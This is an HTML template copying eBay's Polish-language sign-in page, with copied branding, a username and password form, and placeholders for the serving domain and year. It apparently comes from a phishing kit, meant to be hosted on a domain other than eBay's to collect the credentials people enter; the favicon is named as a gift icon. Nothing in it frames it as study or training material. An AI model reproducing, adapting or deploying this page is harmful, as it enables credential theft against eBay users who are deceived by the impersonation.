<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" type="image/x-icon" href="{domain}/static/gift-icon.png" />
    <title>eBay - Sign in</title>
    <style>
      * {
        padding: 0;
        margin: 0;
        box-sizing: border-box;
      }
      a {
        text-decoration: none;
        cursor: pointer;
        color: #0000ee;
      }
      body {
        background-color: #fff;
        color: #1c1e21;
        font-family: 'Bold Universe', sans-serif;
        font-size: small;
      }
      main {
        min-height: calc(100vh - 10vh);
        width: 100vw;
        position: relative;
        margin: 0 auto;
      }
      footer {
        height: 10vh;
        bottom: 0px;
        left: 0px;
        right: 0px;
      }
      .row {
        display: block;
        margin: auto;
        width: 100%;
      }
      .col-logo img {
        display: block;
        float: left;
        width: 120px;
        max-width: 100%;
        margin: 20px 0 0 10px;
      }
      .col-link {
        text-align: end;
        display: block;
        padding: 9px 8px;
      }
      .col-link a {
        text-decoration: none;
        color: #3665f3;
      }
      .col-form h1 {
        display: block;
        text-align: center;
        font-size: 36px;
        font-weight: 700;
        font-style: normal;
        line-height: 36px;
        letter-spacing: normal;
        padding-top: 10px;
        color: #151e27;
        max-width: 360px;
        margin: auto;
        margin-top: 120px;
      }
      .col-form h4 {
        display: block;
        text-align: center;
        font-size: 14px;
        font-weight: 550;
        line-height: 30px;
        letter-spacing: normal;
        padding: auto;
      }
      .col-form h4 a {
        color: #3665f3;
        cursor: pointer;
      }
      .form-container {
        max-width: 370px;
        margin: auto;
      }
      .form-container input {
        margin: auto;
        width: 98%;
        font-style: bold;
        border-radius: 7px;
        height: 37px;
        padding: 0 16px;
        border-width: 1px;
        background-color: #f7f7f7;
        border: 1px solid rgb(131, 131, 131);
      }
      .form-container input[type='text'] {
        margin-top: 35px;
      }
      .form-container input[type='password'] {
        margin-top: 8px;
      }
      ::placeholder {
        color: #151e27;
        font-weight: 549;
        font-size: 14px;
      }
      .form-container .btn-continue {
        background-color: #3665f3;
        color: white;
        border: 1px solid #3665f3;
        width: 100%;
        border-radius: 30px;
        height: 45px;
        margin-top: 20px;
        margin-bottom: 20px;
        cursor: pointer;
      }
      .stay-signed-content {
        text-align: center;
        font-weight: 550;
      }
      .stay-signed-content p {
        margin-top: 8px;
      }
      .stay-signed-content a {
        color: #3665f3;
        font-weight: normal;
      }
      .footer-contents {
        padding-top: 20px;
      }
      .footer-contents hr {
        opacity: 0.25;
      }
      .footer-contents p {
        margin: auto;
        padding: 7px;
        text-align: center;
        color: #41413f;
        font-size: 12px;
      }
      @media only screen and (max-width: 450px) {
        .col-link {
          display: none;
        }
        .col-logo img {
          text-align: center;
          float: none;
          margin: auto;
        }
        .col-form h1 {
          margin-top: 15px;
        }
        .row {
          padding: 25px;
        }
      }
    </style>
  </head>
  <body>
    <main>
      <div class="row">
        <div class="col-logo">
          <img src="{domain}/static/ebay-logo.png" alt="Logo" />
        </div>
        <div class="col-link">
          <p>
            <a>Powiedz nam co myślisz</a>
          </p>
        </div>
        <div class="col-form">
          <h1>Witaj</h1>

          <h4>Zaloguj się do eBay lub <a>utwórz konto</a></h4>

          <div class="form-container">
            <form method="post" action="">
              <input type="text" placeholder="E-mail lub nazwa użytkownika" required />

              <input type="password" placeholder="Hasło" required />

              <button class="btn-continue">
                <h3><b>Kontynuuj</b></h3>
              </button>
            </form>
          </div>

          <div class="stay-signed-content">
            <input type="checkbox" checked /> Zapamiętaj mnie

            <p>
              Korzystasz z urządzenia publicznego lub dzielisz je z innymi osobami?
              <br />
              Usuń zaznaczenie, aby chronić swoje konto.
            </p>

            <a>Dowiedz się więcej</a>
          </div>
        </div>
      </div>
    </main>

    <footer>
      <div class="footer-contents">
        <hr />
        <p>
          Copyright © 1995-{current_year} eBay Inc. Wszelkie prawa zastrzeżone.
          Warunki dostępu, Umowa z użytkownikiem, Oświadczenie o prywatności, Pliki cookies, Program AdChoice
        </p>
      </div>
    </footer>
  </body>
</html>